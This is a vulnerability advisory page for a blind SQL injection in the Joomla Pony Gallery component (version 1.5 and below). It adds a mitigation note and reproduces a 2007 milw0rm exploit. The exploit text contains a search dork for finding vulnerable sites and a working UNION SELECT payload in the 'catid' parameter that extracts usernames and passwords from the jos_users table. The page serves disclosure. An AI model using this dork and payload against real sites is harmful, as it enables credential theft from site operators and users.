Joomla Component Pony Gallery

vendor:

Pony Gallery

by:

ajann

7.5

CVSS

HIGH

Remote Blind SQL Injection

CWE

Product Name: Pony Gallery

Affected Version From: <= 1.5

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Joomla Component Pony Gallery <= 1.5 Remote Blind SQL Injection Vulnerability

This vulnerability allows an attacker to perform blind SQL injection in the Joomla Component Pony Gallery version 1.5 and below. By manipulating the 'catid' parameter in the 'viewcategory' function, an attacker can inject SQL code and potentially retrieve sensitive information from the database.

Mitigation:

The vendor should release a patch or update to fix the SQL injection vulnerability. In the meantime, users are advised to restrict access to the affected component or apply a web application firewall to prevent exploitation.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  Joomla Component Pony Gallery <= 1.5 Remote Blind SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://joomlander.net
# $$      :  Free
# Dork    :  inurl:"index.php?option=com_ponygallery"
# DorkEx  :  http://www.google.com.tr/search?hl=tr&q=inurl%3A%22index.php%3Foption%3Dcom_ponygallery%22&btnG=Ara&meta=lr%3D

# Info    :  \*Herhangi bir resim kategorisine girin,onunda alt kategorisi varsa girin
               her sitede uygulanamÃ½yor acik.Exploit yazmasÃ½ zor geldi ne yln sÃ¶liyim
               gecenin 2sinde:  )

# Msg     :  Kandiliniz Mubarek Olsun.....

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=[SQL Inject]

Example: 

//index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-07-19]